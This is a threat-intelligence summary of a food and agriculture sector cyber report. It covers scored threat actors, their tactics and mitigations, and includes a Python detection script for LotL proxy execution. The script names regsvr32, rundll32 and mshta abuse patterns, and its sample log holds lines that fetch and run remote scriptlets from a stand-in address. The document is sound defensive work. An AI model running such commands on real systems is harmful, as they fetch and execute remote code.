Full Report
The Food and Ag-ISAC paints a stark picture of a sector facing sustained and increasingly sophisticated cyber pressure,... The post Food and Ag-ISAC finds 72 active threat actors behind persistent, sophisticated cyber attacks targeting food supply chains appeared first on Industrial Cyber.
Analysis Summary
Based on "The 2025 Food and Agriculture Cyber Threat Report" issued by the Food and Ag-ISAC, here is a structured summary of the threat actor landscape.
*Note: Since the article provides a high-level overview of 72 actors, this summary focuses on the top-tier adversaries identified by the Predictive Adversary Scoring System (PASS).*
# Threat Actor: Food & Ag Sector Adversaries (Aggregate)
## Attribution & Identity
The Food and Ag-ISAC monitors over 330 adversaries, identifying **72 active threat actors** specifically targeting the food supply chain.
- **Russia-affiliated actors:** Account for 59.3% of observed activity.
- **China-affiliated actors:** Account for 25.4% of observed activity.
- **Top Scored Actors (PASS Score):**
  - **Lazarus Group** (North Korea, Nation-State) - Score: 84
  - **Moonstone Sleet** (North Korea, Nation-State) - Score: 84
  - **APT41** (China, Nation-State) - Score: 79
  - **Scattered Spider** (Cybercriminal) - Score: 77
  - **Qilin** (Ransomware) - Score: 76
  - **LockBit 5.0** (Ransomware) - Score: 76
  - **Lapsus$ Hunters** (Cybercriminal) - Score: 76
  - **Dark Engine** (Hacktivist) - Score: 76
  - **APT18** (China, Nation-State) - Score: 75
  - **Akira** (Ransomware) - Score: 73
## Activity Summary
The report details a 2024-2025 campaign period characterized by "sustained and increasingly sophisticated cyber pressure." These actors are engaged in persistent operations ranging from data extortion and ransomware to strategic espionage aimed at the "farm-to-table" supply chain.
## Tactics, Techniques & Procedures
- **Living-off-the-Land (LotL):** Use of legitimate system tools to blend in with normal network traffic.
- **Supply Chain Compromise:** Exploiting third-party vendors to gain access to primary targets.
- **Modified Malware:** Deployment of customized malicious code to evade traditional signatures.
- **Data Extortion:** Stealing sensitive data and threatening release to force payment.
- **Vulnerability Exploitation:** Rapid weaponization of sector-specific vulnerabilities.
- **MITRE ATT&CK IDs (Implied):**
  - T1195 (Supply Chain Compromise)
  - T1218 (System Binary Proxy Execution - LotL)
  - T1486 (Data Encrypted for Impact - Ransomware)
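The Living-off-the-Land technique above (T1218, System Binary Proxy Execution) is hard to catch with signatures because the binaries involved are signed Windows components. The following is an added detection sketch, not code from the report or from the Food and Ag-ISAC: it parses a constructed process-creation log format (the `host=… pid=… image=… cmdline=…` layout, the hostnames and the `203.0.113.7` address are all made up for the example) and flags the well-documented abuse patterns where `regsvr32`, `rundll32` or `mshta` are handed a remote URL or a script protocol handler instead of a local file. Benign invocations of the same binaries are included to show that the rules key on the argument shape, not on the binary name alone.

```python
"""Detection sketch for Living-off-the-Land via system binary proxy execution (T1218).

Added example, not from the Food and Ag-ISAC report. It scans constructed
process-creation events for signed Windows binaries (regsvr32, rundll32, mshta)
being passed remote URLs or script protocol handlers, and returns the matches
together with the ATT&CK technique they map to.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int
    binary: str
    reason: str
    technique: str


# Each rule: (image name, pattern applied to the command line, why it is suspicious).
# The patterns key on arguments these binaries never need for legitimate local use.
RULES = [
    ("regsvr32.exe", re.compile(r"/i:\s*https?://", re.I), "scriptlet loaded from remote URL"),
    ("rundll32.exe", re.compile(r"javascript:", re.I), "JavaScript protocol handler via rundll32"),
    ("mshta.exe", re.compile(r"\bhttps?://", re.I), "HTA fetched from remote URL"),
    ("mshta.exe", re.compile(r"(vbscript|javascript):", re.I), "inline script passed to mshta"),
]

# Parser for the constructed log layout used in SAMPLE_LOG (assumption, not a real product format):
# "<timestamp> host=<name> pid=<n> image=<path> cmdline=<rest of line>"
LOG_RE = re.compile(r"^\S+ host=\S+ pid=\d+ image=(?P<image>\S+) cmdline=(?P<cmdline>.*)$")


def parse_line(line: str):
    """Return (image_basename_lowercase, cmdline) or None when the line is malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    image = m.group("image").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return image, m.group("cmdline")


def detect_proxy_execution(lines):
    """Apply RULES to every parseable event; one Finding per matching event."""
    findings = []
    for n, line in enumerate(lines, 1):
        parsed = parse_line(line)
        if parsed is None:
            continue  # malformed telemetry is skipped, not treated as malicious
        image, cmdline = parsed
        for binary, pattern, reason in RULES:
            if image == binary and pattern.search(cmdline):
                findings.append(Finding(n, binary, reason, "T1218"))
                break
    return findings


# Constructed sample events (not real telemetry): two benign uses, three abusive patterns,
# and one malformed line the parser must skip.
SAMPLE_LOG = [
    "2025-01-10T08:01:02Z host=plc-hmi-01 pid=4120 image=C:\\Windows\\System32\\regsvr32.exe cmdline=regsvr32.exe /s C:\\Program Files\\Vendor\\driver.dll",
    "2025-01-10T08:01:09Z host=plc-hmi-01 pid=4133 image=C:\\Windows\\System32\\regsvr32.exe cmdline=regsvr32.exe /s /n /u /i:http://203.0.113.7/x.sct",
    "2025-01-10T08:02:15Z host=erp-app-02 pid=5512 image=C:\\Windows\\System32\\rundll32.exe cmdline=rundll32.exe shell32.dll,Control_RunDLL",
    "2025-01-10T08:02:40Z host=erp-app-02 pid=5530 image=C:\\Windows\\System32\\rundll32.exe cmdline=rundll32.exe javascript:\"<constructed placeholder>\"",
    "2025-01-10T08:03:01Z host=wh-scale-03 pid=6102 image=C:\\Windows\\System32\\mshta.exe cmdline=mshta.exe http://203.0.113.7/a.hta",
    "malformed line that the parser should skip",
]

if __name__ == "__main__":
    for f in detect_proxy_execution(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.binary} -> {f.reason} [{f.technique}]")
```

In a real deployment the same rules would sit on Sysmon event ID 1 or EDR process-creation telemetry rather than a hand-rolled log format, and each hit would be enriched with parent process and user before alerting; the point here is that proxy-execution abuse is visible in the arguments even when the executing binary is trusted.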
## Targeting
- **Sectors:** Agriculture, food processing, logistics, and the broader farm-to-table supply chain.
- **Geography:** Global, with significant focus on the Nordics (Finland), the United States, and regions affected by Middle East tensions.
- **Victims:** While specific company names were redacted in the summary, the report highlights "defense contractors" and "water infrastructure" as overlapping critical sectors.
## Tools & Infrastructure
- **Malware Families:**
  - Ransomware variants (Akira, LockBit 5.0, Qilin).
  - Specialized tools used by Lazarus Group and Moonstone Sleet.
- **Infrastructure:**
  - Command and Control (C2) servers (specific IPs/domains not listed in the text).
  - Compromised remote access points.
## Implications
The strategic intent of these actors is twofold:
1. **Financial Gain:** Large-scale ransomware ecosystems see the food sector as a high-value, high-pressure target where downtime is intolerable.
2. **Geopolitical Leverage:** Nation-states (Russia and China) target the sector to map dependencies, conduct industrial espionage, or prepare for disruptive "wiper" operations in the event of conflict.
## Mitigations
- **Resource Allocation:** Utilize the PASS (Predictive Adversary Scoring System) to prioritize defense against high-scoring actors like Lazarus and APT41.
- **OT/ICS Security:** Move from system-centric protection to control-centric risk management.
- **Supply Chain Hygiene:** Implement rigorous third-party risk assessments and secure remote access protocols.
- **Information Sharing:** Engage with the Food and Ag-ISAC for actionable, real-time threat intelligence.